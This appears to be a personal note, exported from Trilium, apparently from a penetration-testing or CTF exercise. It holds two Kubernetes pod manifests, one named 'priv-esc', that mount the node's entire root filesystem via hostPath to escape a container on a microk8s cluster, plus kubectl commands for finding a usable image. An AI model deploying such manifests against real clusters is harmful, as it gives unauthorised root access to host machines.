<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>host.yaml</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>host.yaml</h1>

      <div class="ck-content">
        <p>we need the correct image name, which can be found from  <code>microk8s.kubectl get deployments -o wide</code> or</p>
        <p><code>microk8s.kubectl get node -o yaml</code>

        </p><pre><code class="language-text-plain">apiVersion: v1
kind: Pod
metadata:
  name: host
spec:
  containers:
  - image: docker.io/library/nginx@sha256:6d75c99af15565a301e48297fa2d121e15d80ad526f8369c526324f0f7ccb750
    name: host
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    volumeMounts:
    - mountPath: /host
      name: host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory</code></pre><pre><code class="language-text-plain">apiVersion: v1
kind: Pod
metadata:
  name: priv-esc
spec:
  containers:
  - name: shell
    image: localhost:32000/bsnginx
    command:
      - "/bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /mnt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory</code></pre>
      </div>
    </div>
  </body>

</html>